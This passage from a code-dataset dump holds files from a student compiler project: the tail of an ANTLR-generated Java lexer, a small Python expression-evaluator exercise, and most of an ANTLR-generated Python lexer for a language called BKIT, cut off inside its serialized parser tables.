u0203\\7@\\2\\2\\u0203\\u0204\\7?\\2\"+\n\t\t\"\\2\\u0204\\u008c\\3\\2\\2\\2\\u0205\\u0206\\7?\\2\\2\\u0206\\u0207\\7^\\2\\2\\u0207\\u0208\"+\n\t\t\"\\7?\\2\\2\\u0208\\u008e\\3\\2\\2\\2\\u0209\\u020a\\7>\\2\\2\\u020a\\u020b\\7\\60\\2\\2\\u020b\"+\n\t\t\"\\u0090\\3\\2\\2\\2\\u020c\\u020d\\7@\\2\\2\\u020d\\u020e\\7\\60\\2\\2\\u020e\\u0092\\3\\2\"+\n\t\t\"\\2\\2\\u020f\\u0210\\7>\\2\\2\\u0210\\u0211\\7?\\2\\2\\u0211\\u0212\\7\\60\\2\\2\\u0212\"+\n\t\t\"\\u0094\\3\\2\\2\\2\\u0213\\u0214\\7@\\2\\2\\u0214\\u0215\\7?\\2\\2\\u0215\\u0216\\7\\60\"+\n\t\t\"\\2\\2\\u0216\\u0096\\3\\2\\2\\2\\u0217\\u0218\\7*\\2\\2\\u0218\\u0098\\3\\2\\2\\2\\u0219\"+\n\t\t\"\\u021a\\7+\\2\\2\\u021a\\u009a\\3\\2\\2\\2\\u021b\\u021c\\7]\\2\\2\\u021c\\u009c\\3\\2\\2\"+\n\t\t\"\\2\\u021d\\u021e\\7_\\2\\2\\u021e\\u009e\\3\\2\\2\\2\\u021f\\u0220\\7}\\2\\2\\u0220\\u00a0\"+\n\t\t\"\\3\\2\\2\\2\\u0221\\u0222\\7\\177\\2\\2\\u0222\\u00a2\\3\\2\\2\\2\\u0223\\u0224\\7<\\2\\2\"+\n\t\t\"\\u0224\\u00a4\\3\\2\\2\\2\\u0225\\u0226\\7\\60\\2\\2\\u0226\\u00a6\\3\\2\\2\\2\\u0227\\u0228\"+\n\t\t\"\\7=\\2\\2\\u0228\\u00a8\\3\\2\\2\\2\\u0229\\u022a\\7.\\2\\2\\u022a\\u00aa\\3\\2\\2\\2\\33\"+\n\t\t\"\\2\\u00b1\\u00b3\\u00ba\\u00c3\\u00c7\\u00cf\\u00dd\\u00e7\\u00f3\\u00f6\\u00fd\\u0103\"+\n\t\t\"\\u0109\\u010d\\u0110\\u011e\\u0128\\u012d\\u0132\\u0138\\u013d\\u0144\\u014a\\u0150\"+\n\t\t\"\\4\\b\\2\\2\\3\\37\\2\";\n\tpublic static final ATN _ATN =\n\t\tnew ATNDeserializer().deserialize(_serializedATN.toCharArray());\n\tstatic {\n\t\t_decisionToDFA = new DFA[_ATN.getNumberOfDecisions()];\n\t\tfor (int i = 0; i < _ATN.getNumberOfDecisions(); i++) {\n\t\t\t_decisionToDFA[i] = new DFA(_ATN.getDecisionState(i), i);\n\t\t}\n\t}\n}" }, { "alpha_fraction": 0.5114971995353699, "alphanum_fraction": 0.5145630836486816, "avg_line_length": 22.309524536132812, "blob_id": "e043ecacae334854744c79bc387e04f13989abef", "content_id": "b45648011afd0e88b296c38c0c48a92cf78afa23", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "Python", "length_bytes": 1957, "license_type": "no_license", "max_line_length": 49, "num_lines": 84, "path": "/OOP/Question3.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class Expr:\n pass\n\nclass Var(Expr):\n def __init__(self, _name):\n self.name = _name\n \n def get_val(self):\n return Number(float(1))\n\nclass Number(Expr):\n def __init__(self, _number):\n self.number = _number\n\n def print(self):\n print(str(self.number))\n\n def get_val(self):\n return self\n\n def __add__(self, op):\n return Number(self.number + op.number)\n\n def __sub__(self, op):\n return Number(self.number - op.number)\n \n def __mul__(self, op):\n return Number(self.number * op.number)\n \n def __div__(self, op):\n return Number(self.number / op.number)\n\nclass UnOp(Expr):\n def __init__(self, _op, _arg):\n self.operator = _op\n self.arg = _arg\n \n def eval(self):\n\n if isinstance(self.arg, (Var, Number)):\n self.arg = self.arg.get_val()\n else: self.arg = self.arg.eval()\n\n if self.operator == \"+\":\n return self.arg\n \n if self.operator == \"-\":\n return Number(0)-self.arg\n \n\nclass BinOp(Expr):\n def __init__(self, _op, _left, _right):\n self.operator = _op\n self.left = _left\n self.right = _right\n\n def eval(self):\n if isinstance(self.left, (Var, Number)):\n self.left = self.left.get_val()\n else: self.left = self.left.eval()\n\n if isinstance(self.right, (Var, Number)):\n self.right = self.right.get_val()\n else: self.right = self.right.eval()\n\n if self.operator == \"+\":\n return self.left + self.right\n \n if self.operator == \"-\":\n return self.left - self.right\n\n if self.operator == \"*\":\n return self.left * self.right\n\n if self.operator == \"/\":\n return self.left / self.right\n\n\nx = Var(\"x\")\nv = BinOp(\"+\", x, Number(0.2))\nt = BinOp(\"*\", v, Number(3))\nk = UnOp('-', UnOp('+', Number(1)))\nt.eval().print()\nk.eval().print()" }, { "alpha_fraction": 0.2950237989425659, "alphanum_fraction": 
0.565905749797821, "avg_line_length": 59.9619255065918, "blob_id": "3d0d22afead67ef404d8bb56428dff2411f0fe7d", "content_id": "7daa2d997fb59549628028cc961366f5e975b0af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30445, "license_type": "no_license", "max_line_length": 112, "num_lines": 499, "path": "/Assignments/assignment1/src/forJava/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/Assignments/assignment1/src/forJava/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2M\")\n buf.write(\"\\u02be\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\4.\")\n buf.write(\"\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\")\n buf.write(\"\\t\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\")\n buf.write(\"\\4;\\t;\\4<\\t<\\4=\\t=\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\t\")\n buf.write(\"C\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\\tI\\4J\\tJ\\4K\\tK\\4L\\t\")\n buf.write(\"L\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\\4U\\t\")\n 
buf.write(\"U\\4V\\tV\\4W\\tW\\4X\\tX\\4Y\\tY\\4Z\\tZ\\4[\\t[\\4\\\\\\t\\\\\\3\\2\\3\\2\")\n buf.write(\"\\3\\2\\3\\2\\3\\2\\7\\2\\u00bf\\n\\2\\f\\2\\16\\2\\u00c2\\13\\2\\3\\3\\3\\3\")\n buf.write(\"\\3\\4\\3\\4\\3\\5\\3\\5\\3\\6\\3\\6\\5\\6\\u00cc\\n\\6\\3\\7\\3\\7\\3\\7\\5\\7\")\n buf.write(\"\\u00d1\\n\\7\\3\\7\\6\\7\\u00d4\\n\\7\\r\\7\\16\\7\\u00d5\\3\\b\\3\\b\\7\")\n buf.write(\"\\b\\u00da\\n\\b\\f\\b\\16\\b\\u00dd\\13\\b\\3\\t\\6\\t\\u00e0\\n\\t\\r\\t\")\n buf.write(\"\\16\\t\\u00e1\\3\\t\\3\\t\\5\\t\\u00e6\\n\\t\\3\\t\\5\\t\\u00e9\\n\\t\\3\")\n buf.write(\"\\n\\3\\n\\3\\n\\3\\13\\3\\13\\3\\13\\3\\f\\3\\f\\3\\f\\3\\r\\3\\r\\3\\r\\5\\r\")\n buf.write(\"\\u00f7\\n\\r\\3\\16\\3\\16\\3\\17\\3\\17\\3\\20\\3\\20\\3\\20\\3\\20\\5\\20\")\n buf.write(\"\\u0101\\n\\20\\3\\20\\3\\20\\7\\20\\u0105\\n\\20\\f\\20\\16\\20\\u0108\")\n buf.write(\"\\13\\20\\3\\21\\3\\21\\3\\21\\7\\21\\u010d\\n\\21\\f\\21\\16\\21\\u0110\")\n buf.write(\"\\13\\21\\5\\21\\u0112\\n\\21\\3\\22\\3\\22\\3\\22\\3\\22\\5\\22\\u0118\")\n buf.write(\"\\n\\22\\3\\22\\3\\22\\7\\22\\u011c\\n\\22\\f\\22\\16\\22\\u011f\\13\\22\")\n buf.write(\"\\3\\23\\3\\23\\3\\23\\5\\23\\u0124\\n\\23\\3\\24\\3\\24\\3\\25\\3\\25\\5\")\n buf.write(\"\\25\\u012a\\n\\25\\3\\26\\3\\26\\7\\26\\u012e\\n\\26\\f\\26\\16\\26\\u0131\")\n buf.write(\"\\13\\26\\3\\26\\3\\26\\3\\26\\3\\27\\3\\27\\3\\27\\3\\27\\3\\27\\3\\30\\3\")\n buf.write(\"\\30\\3\\30\\3\\30\\3\\30\\3\\30\\3\\31\\3\\31\\3\\31\\3\\31\\3\\31\\3\\31\")\n buf.write(\"\\3\\31\\3\\31\\3\\31\\3\\32\\3\\32\\3\\32\\3\\33\\3\\33\\3\\33\\3\\33\\3\\33\")\n buf.write(\"\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\35\\3\\35\\3\\35\\3\\35\")\n buf.write(\"\\3\\35\\3\\35\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\37\")\n buf.write(\"\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3 \\3 \\3 \\3 \\3 \\3 \\3 \\3\")\n buf.write(\" \\3 \\3!\\3!\\3!\\3!\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\")\n 
buf.write(\"#\\3#\\3#\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3%\\3%\\3%\\3%\\3%\\3\")\n buf.write(\"%\\3%\\3&\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\3\\'\\3(\\3(\\3(\\3(\\3(\\3(\")\n buf.write(\"\\3)\\3)\\3)\\3)\\3)\\3*\\3*\\3*\\3*\\3*\\3*\\3+\\3+\\3+\\3+\\3+\\3+\\3\")\n buf.write(\",\\3,\\3-\\3-\\3-\\3.\\3.\\3/\\3/\\3/\\3\\60\\3\\60\\3\\61\\3\\61\\3\\61\")\n buf.write(\"\\3\\62\\3\\62\\3\\63\\3\\63\\3\\63\\3\\64\\3\\64\\3\\64\\3\\65\\3\\65\\3\\66\")\n buf.write(\"\\3\\66\\3\\66\\3\\67\\3\\67\\3\\67\\38\\38\\38\\39\\39\\39\\3:\\3:\\3;\\3\")\n buf.write(\";\\3<\\3<\\3<\\3=\\3=\\3=\\3>\\3>\\3>\\3>\\3?\\3?\\3?\\3@\\3@\\3@\\3A\\3\")\n buf.write(\"A\\3A\\3A\\3B\\3B\\3B\\3B\\3C\\3C\\3D\\3D\\3E\\3E\\3F\\3F\\3G\\3G\\3H\\3\")\n buf.write(\"H\\3I\\3I\\3J\\3J\\3K\\3K\\3L\\3L\\3M\\3M\\3N\\3N\\3O\\3O\\3O\\3O\\3O\\3\")\n buf.write(\"O\\3O\\3O\\3O\\3O\\3O\\3O\\3O\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3\")\n buf.write(\"P\\3P\\3P\\3P\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3R\\3\")\n buf.write(\"R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3S\\3S\\3S\\3\")\n buf.write(\"S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3T\\3T\\3T\\3T\\3T\\3T\\3\")\n buf.write(\"T\\3T\\3T\\3T\\3T\\3T\\3T\\3T\\3T\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3\")\n buf.write(\"U\\3U\\3U\\3U\\3U\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3\")\n buf.write(\"V\\3V\\3V\\3W\\3W\\3W\\3W\\7W\\u0289\\nW\\fW\\16W\\u028c\\13W\\3W\\3\")\n buf.write(\"W\\3W\\3W\\3W\\3X\\6X\\u0294\\nX\\rX\\16X\\u0295\\3X\\3X\\3Y\\3Y\\7Y\")\n buf.write(\"\\u029c\\nY\\fY\\16Y\\u029f\\13Y\\3Y\\3Y\\3Y\\3Z\\3Z\\7Z\\u02a6\\nZ\")\n buf.write(\"\\fZ\\16Z\\u02a9\\13Z\\3Z\\5Z\\u02ac\\nZ\\3Z\\3Z\\3[\\3[\\3[\\3[\\3[\")\n buf.write(\"\\3[\\7[\\u02b6\\n[\\f[\\16[\\u02b9\\13[\\3[\\3[\\3\\\\\\3\\\\\\4\\u028a\")\n buf.write(\"\\u02b7\\2]\\3\\3\\5\\2\\7\\2\\t\\2\\13\\2\\r\\2\\17\\2\\21\\2\\23\\2\\25\\2\")\n buf.write(\"\\27\\2\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\2%\\4\\'\\5)\\6+\\7-\\b/\\t\\61\")\n 
buf.write(\"\\n\\63\\13\\65\\f\\67\\r9\\16;\\17=\\20?\\21A\\22C\\23E\\24G\\25I\\26\")\n buf.write(\"K\\27M\\30O\\31Q\\32S\\33U\\34W\\35Y\\36[\\37] _!a\\\"c#e$g%i&k\\'\")\n buf.write(\"m(o)q*s+u,w-y.{/}\\60\\177\\61\\u0081\\62\\u0083\\63\\u0085\\64\")\n buf.write(\"\\u0087\\65\\u0089\\66\\u008b\\67\\u008d8\\u008f9\\u0091:\\u0093\")\n buf.write(\";\\u0095<\\u0097=\\u0099>\\u009b?\\u009d@\\u009fA\\u00a1B\\u00a3\")\n buf.write(\"C\\u00a5D\\u00a7E\\u00a9F\\u00abG\\u00adH\\u00afI\\u00b1J\\u00b3\")\n buf.write(\"K\\u00b5L\\u00b7M\\3\\2\\22\\3\\2c|\\3\\2C\\\\\\3\\2\\62;\\4\\2GGgg\\3\")\n buf.write(\"\\2\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\\16\\17$$))^^\\5\\2\\62\")\n buf.write(\";CHch\\3\\2\\629\\5\\2\\63;CHch\\3\\2\\62\\62\\3\\2\\63;\\3\\2\\639\\5\")\n buf.write(\"\\2\\13\\f\\16\\17\\\"\\\"\\4\\3\\n\\f\\16\\17\\3\\2,,\\2\\u02cb\\2\\3\\3\\2\")\n buf.write(\"\\2\\2\\2%\\3\\2\\2\\2\\2\\'\\3\\2\\2\\2\\2)\\3\\2\\2\\2\\2+\\3\\2\\2\\2\\2-\\3\")\n buf.write(\"\\2\\2\\2\\2/\\3\\2\\2\\2\\2\\61\\3\\2\\2\\2\\2\\63\\3\\2\\2\\2\\2\\65\\3\\2\\2\")\n buf.write(\"\\2\\2\\67\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2;\\3\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\")\n buf.write(\"\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\")\n buf.write(\"\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2O\\3\\2\\2\\2\\2Q\\3\\2\\2\\2\\2\")\n buf.write(\"S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\\2Y\\3\\2\\2\\2\\2[\\3\\2\\2\\2\")\n buf.write(\"\\2]\\3\\2\\2\\2\\2_\\3\\2\\2\\2\\2a\\3\\2\\2\\2\\2c\\3\\2\\2\\2\\2e\\3\\2\\2\")\n buf.write(\"\\2\\2g\\3\\2\\2\\2\\2i\\3\\2\\2\\2\\2k\\3\\2\\2\\2\\2m\\3\\2\\2\\2\\2o\\3\\2\")\n buf.write(\"\\2\\2\\2q\\3\\2\\2\\2\\2s\\3\\2\\2\\2\\2u\\3\\2\\2\\2\\2w\\3\\2\\2\\2\\2y\\3\")\n buf.write(\"\\2\\2\\2\\2{\\3\\2\\2\\2\\2}\\3\\2\\2\\2\\2\\177\\3\\2\\2\\2\\2\\u0081\\3\\2\")\n buf.write(\"\\2\\2\\2\\u0083\\3\\2\\2\\2\\2\\u0085\\3\\2\\2\\2\\2\\u0087\\3\\2\\2\\2\\2\")\n buf.write(\"\\u0089\\3\\2\\2\\2\\2\\u008b\\3\\2\\2\\2\\2\\u008d\\3\\2\\2\\2\\2\\u008f\")\n 
buf.write(\"\\3\\2\\2\\2\\2\\u0091\\3\\2\\2\\2\\2\\u0093\\3\\2\\2\\2\\2\\u0095\\3\\2\\2\")\n buf.write(\"\\2\\2\\u0097\\3\\2\\2\\2\\2\\u0099\\3\\2\\2\\2\\2\\u009b\\3\\2\\2\\2\\2\\u009d\")\n buf.write(\"\\3\\2\\2\\2\\2\\u009f\\3\\2\\2\\2\\2\\u00a1\\3\\2\\2\\2\\2\\u00a3\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00a5\\3\\2\\2\\2\\2\\u00a7\\3\\2\\2\\2\\2\\u00a9\\3\\2\\2\\2\\2\\u00ab\")\n buf.write(\"\\3\\2\\2\\2\\2\\u00ad\\3\\2\\2\\2\\2\\u00af\\3\\2\\2\\2\\2\\u00b1\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00b3\\3\\2\\2\\2\\2\\u00b5\\3\\2\\2\\2\\2\\u00b7\\3\\2\\2\\2\\3\\u00b9\")\n buf.write(\"\\3\\2\\2\\2\\5\\u00c3\\3\\2\\2\\2\\7\\u00c5\\3\\2\\2\\2\\t\\u00c7\\3\\2\\2\")\n buf.write(\"\\2\\13\\u00cb\\3\\2\\2\\2\\r\\u00cd\\3\\2\\2\\2\\17\\u00d7\\3\\2\\2\\2\\21\")\n buf.write(\"\\u00df\\3\\2\\2\\2\\23\\u00ea\\3\\2\\2\\2\\25\\u00ed\\3\\2\\2\\2\\27\\u00f0\")\n buf.write(\"\\3\\2\\2\\2\\31\\u00f6\\3\\2\\2\\2\\33\\u00f8\\3\\2\\2\\2\\35\\u00fa\\3\")\n buf.write(\"\\2\\2\\2\\37\\u0100\\3\\2\\2\\2!\\u0111\\3\\2\\2\\2#\\u0117\\3\\2\\2\\2\")\n buf.write(\"%\\u0123\\3\\2\\2\\2\\'\\u0125\\3\\2\\2\\2)\\u0129\\3\\2\\2\\2+\\u012b\")\n buf.write(\"\\3\\2\\2\\2-\\u0135\\3\\2\\2\\2/\\u013a\\3\\2\\2\\2\\61\\u0140\\3\\2\\2\")\n buf.write(\"\\2\\63\\u0149\\3\\2\\2\\2\\65\\u014c\\3\\2\\2\\2\\67\\u0151\\3\\2\\2\\2\")\n buf.write(\"9\\u0158\\3\\2\\2\\2;\\u015e\\3\\2\\2\\2=\\u0166\\3\\2\\2\\2?\\u016d\\3\")\n buf.write(\"\\2\\2\\2A\\u0176\\3\\2\\2\\2C\\u017a\\3\\2\\2\\2E\\u0183\\3\\2\\2\\2G\\u0186\")\n buf.write(\"\\3\\2\\2\\2I\\u0190\\3\\2\\2\\2K\\u0197\\3\\2\\2\\2M\\u019c\\3\\2\\2\\2\")\n buf.write(\"O\\u01a0\\3\\2\\2\\2Q\\u01a6\\3\\2\\2\\2S\\u01ab\\3\\2\\2\\2U\\u01b1\\3\")\n buf.write(\"\\2\\2\\2W\\u01b7\\3\\2\\2\\2Y\\u01b9\\3\\2\\2\\2[\\u01bc\\3\\2\\2\\2]\\u01be\")\n buf.write(\"\\3\\2\\2\\2_\\u01c1\\3\\2\\2\\2a\\u01c3\\3\\2\\2\\2c\\u01c6\\3\\2\\2\\2\")\n buf.write(\"e\\u01c8\\3\\2\\2\\2g\\u01cb\\3\\2\\2\\2i\\u01ce\\3\\2\\2\\2k\\u01d0\\3\")\n 
buf.write(\"\\2\\2\\2m\\u01d3\\3\\2\\2\\2o\\u01d6\\3\\2\\2\\2q\\u01d9\\3\\2\\2\\2s\\u01dc\")\n buf.write(\"\\3\\2\\2\\2u\\u01de\\3\\2\\2\\2w\\u01e0\\3\\2\\2\\2y\\u01e3\\3\\2\\2\\2\")\n buf.write(\"{\\u01e6\\3\\2\\2\\2}\\u01ea\\3\\2\\2\\2\\177\\u01ed\\3\\2\\2\\2\\u0081\")\n buf.write(\"\\u01f0\\3\\2\\2\\2\\u0083\\u01f4\\3\\2\\2\\2\\u0085\\u01f8\\3\\2\\2\\2\")\n buf.write(\"\\u0087\\u01fa\\3\\2\\2\\2\\u0089\\u01fc\\3\\2\\2\\2\\u008b\\u01fe\\3\")\n buf.write(\"\\2\\2\\2\\u008d\\u0200\\3\\2\\2\\2\\u008f\\u0202\\3\\2\\2\\2\\u0091\\u0204\")\n buf.write(\"\\3\\2\\2\\2\\u0093\\u0206\\3\\2\\2\\2\\u0095\\u0208\\3\\2\\2\\2\\u0097\")\n buf.write(\"\\u020a\\3\\2\\2\\2\\u0099\\u020c\\3\\2\\2\\2\\u009b\\u020e\\3\\2\\2\\2\")\n buf.write(\"\\u009d\\u0210\\3\\2\\2\\2\\u009f\\u021d\\3\\2\\2\\2\\u00a1\\u022b\\3\")\n buf.write(\"\\2\\2\\2\\u00a3\\u0238\\3\\2\\2\\2\\u00a5\\u0248\\3\\2\\2\\2\\u00a7\\u0257\")\n buf.write(\"\\3\\2\\2\\2\\u00a9\\u0266\\3\\2\\2\\2\\u00ab\\u0274\\3\\2\\2\\2\\u00ad\")\n buf.write(\"\\u0284\\3\\2\\2\\2\\u00af\\u0293\\3\\2\\2\\2\\u00b1\\u0299\\3\\2\\2\\2\")\n buf.write(\"\\u00b3\\u02a3\\3\\2\\2\\2\\u00b5\\u02af\\3\\2\\2\\2\\u00b7\\u02bc\\3\")\n buf.write(\"\\2\\2\\2\\u00b9\\u00c0\\5\\5\\3\\2\\u00ba\\u00bf\\5\\5\\3\\2\\u00bb\\u00bf\")\n buf.write(\"\\5\\t\\5\\2\\u00bc\\u00bf\\5\\7\\4\\2\\u00bd\\u00bf\\7a\\2\\2\\u00be\")\n buf.write(\"\\u00ba\\3\\2\\2\\2\\u00be\\u00bb\\3\\2\\2\\2\\u00be\\u00bc\\3\\2\\2\\2\")\n buf.write(\"\\u00be\\u00bd\\3\\2\\2\\2\\u00bf\\u00c2\\3\\2\\2\\2\\u00c0\\u00be\\3\")\n buf.write(\"\\2\\2\\2\\u00c0\\u00c1\\3\\2\\2\\2\\u00c1\\4\\3\\2\\2\\2\\u00c2\\u00c0\")\n buf.write(\"\\3\\2\\2\\2\\u00c3\\u00c4\\t\\2\\2\\2\\u00c4\\6\\3\\2\\2\\2\\u00c5\\u00c6\")\n buf.write(\"\\t\\3\\2\\2\\u00c6\\b\\3\\2\\2\\2\\u00c7\\u00c8\\t\\4\\2\\2\\u00c8\\n\\3\")\n buf.write(\"\\2\\2\\2\\u00c9\\u00cc\\5\\5\\3\\2\\u00ca\\u00cc\\5\\7\\4\\2\\u00cb\\u00c9\")\n buf.write(\"\\3\\2\\2\\2\\u00cb\\u00ca\\3\\2\\2\\2\\u00cc\\f\\3\\2\\2\\2\\u00cd\\u00d0\")\n 
buf.write(\"\\t\\5\\2\\2\\u00ce\\u00d1\\5[.\\2\\u00cf\\u00d1\\5W,\\2\\u00d0\\u00ce\")\n buf.write(\"\\3\\2\\2\\2\\u00d0\\u00cf\\3\\2\\2\\2\\u00d0\\u00d1\\3\\2\\2\\2\\u00d1\")\n buf.write(\"\\u00d3\\3\\2\\2\\2\\u00d2\\u00d4\\5\\t\\5\\2\\u00d3\\u00d2\\3\\2\\2\\2\")\n buf.write(\"\\u00d4\\u00d5\\3\\2\\2\\2\\u00d5\\u00d3\\3\\2\\2\\2\\u00d5\\u00d6\\3\")\n buf.write(\"\\2\\2\\2\\u00d6\\16\\3\\2\\2\\2\\u00d7\\u00db\\t\\6\\2\\2\\u00d8\\u00da\")\n buf.write(\"\\5\\t\\5\\2\\u00d9\\u00d8\\3\\2\\2\\2\\u00da\\u00dd\\3\\2\\2\\2\\u00db\")\n buf.write(\"\\u00d9\\3\\2\\2\\2\\u00db\\u00dc\\3\\2\\2\\2\\u00dc\\20\\3\\2\\2\\2\\u00dd\")\n buf.write(\"\\u00db\\3\\2\\2\\2\\u00de\\u00e0\\5\\t\\5\\2\\u00df\\u00de\\3\\2\\2\\2\")\n buf.write(\"\\u00e0\\u00e1\\3\\2\\2\\2\\u00e1\\u00df\\3\\2\\2\\2\\u00e1\\u00e2\\3\")\n buf.write(\"\\2\\2\\2\\u00e2\\u00e8\\3\\2\\2\\2\\u00e3\\u00e5\\5\\17\\b\\2\\u00e4\")\n buf.write(\"\\u00e6\\5\\r\\7\\2\\u00e5\\u00e4\\3\\2\\2\\2\\u00e5\\u00e6\\3\\2\\2\\2\")\n buf.write(\"\\u00e6\\u00e9\\3\\2\\2\\2\\u00e7\\u00e9\\5\\r\\7\\2\\u00e8\\u00e3\\3\")\n buf.write(\"\\2\\2\\2\\u00e8\\u00e7\\3\\2\\2\\2\\u00e9\\22\\3\\2\\2\\2\\u00ea\\u00eb\")\n buf.write(\"\\7^\\2\\2\\u00eb\\u00ec\\n\\7\\2\\2\\u00ec\\24\\3\\2\\2\\2\\u00ed\\u00ee\")\n buf.write(\"\\7^\\2\\2\\u00ee\\u00ef\\t\\7\\2\\2\\u00ef\\26\\3\\2\\2\\2\\u00f0\\u00f1\")\n buf.write(\"\\7)\\2\\2\\u00f1\\u00f2\\7$\\2\\2\\u00f2\\30\\3\\2\\2\\2\\u00f3\\u00f7\")\n buf.write(\"\\n\\b\\2\\2\\u00f4\\u00f7\\5\\25\\13\\2\\u00f5\\u00f7\\5\\27\\f\\2\\u00f6\")\n buf.write(\"\\u00f3\\3\\2\\2\\2\\u00f6\\u00f4\\3\\2\\2\\2\\u00f6\\u00f5\\3\\2\\2\\2\")\n buf.write(\"\\u00f7\\32\\3\\2\\2\\2\\u00f8\\u00f9\\t\\t\\2\\2\\u00f9\\34\\3\\2\\2\\2\")\n buf.write(\"\\u00fa\\u00fb\\t\\n\\2\\2\\u00fb\\36\\3\\2\\2\\2\\u00fc\\u00fd\\7\\62\")\n buf.write(\"\\2\\2\\u00fd\\u0101\\7z\\2\\2\\u00fe\\u00ff\\7\\62\\2\\2\\u00ff\\u0101\")\n buf.write(\"\\7Z\\2\\2\\u0100\\u00fc\\3\\2\\2\\2\\u0100\\u00fe\\3\\2\\2\\2\\u0101\")\n 
buf.write(\"\\u0102\\3\\2\\2\\2\\u0102\\u0106\\t\\13\\2\\2\\u0103\\u0105\\5\\33\\16\")\n buf.write(\"\\2\\u0104\\u0103\\3\\2\\2\\2\\u0105\\u0108\\3\\2\\2\\2\\u0106\\u0104\")\n buf.write(\"\\3\\2\\2\\2\\u0106\\u0107\\3\\2\\2\\2\\u0107 \\3\\2\\2\\2\\u0108\\u0106\")\n buf.write(\"\\3\\2\\2\\2\\u0109\\u0112\\t\\f\\2\\2\\u010a\\u010e\\t\\r\\2\\2\\u010b\")\n buf.write(\"\\u010d\\t\\4\\2\\2\\u010c\\u010b\\3\\2\\2\\2\\u010d\\u0110\\3\\2\\2\\2\")\n buf.write(\"\\u010e\\u010c\\3\\2\\2\\2\\u010e\\u010f\\3\\2\\2\\2\\u010f\\u0112\\3\")\n buf.write(\"\\2\\2\\2\\u0110\\u010e\\3\\2\\2\\2\\u0111\\u0109\\3\\2\\2\\2\\u0111\\u010a\")\n buf.write(\"\\3\\2\\2\\2\\u0112\\\"\\3\\2\\2\\2\\u0113\\u0114\\7\\62\\2\\2\\u0114\\u0118\")\n buf.write(\"\\7q\\2\\2\\u0115\\u0116\\7\\62\\2\\2\\u0116\\u0118\\7Q\\2\\2\\u0117\")\n buf.write(\"\\u0113\\3\\2\\2\\2\\u0117\\u0115\\3\\2\\2\\2\\u0118\\u0119\\3\\2\\2\\2\")\n buf.write(\"\\u0119\\u011d\\t\\16\\2\\2\\u011a\\u011c\\5\\35\\17\\2\\u011b\\u011a\")\n buf.write(\"\\3\\2\\2\\2\\u011c\\u011f\\3\\2\\2\\2\\u011d\\u011b\\3\\2\\2\\2\\u011d\")\n buf.write(\"\\u011e\\3\\2\\2\\2\\u011e$\\3\\2\\2\\2\\u011f\\u011d\\3\\2\\2\\2\\u0120\")\n buf.write(\"\\u0124\\5!\\21\\2\\u0121\\u0124\\5\\37\\20\\2\\u0122\\u0124\\5#\\22\")\n 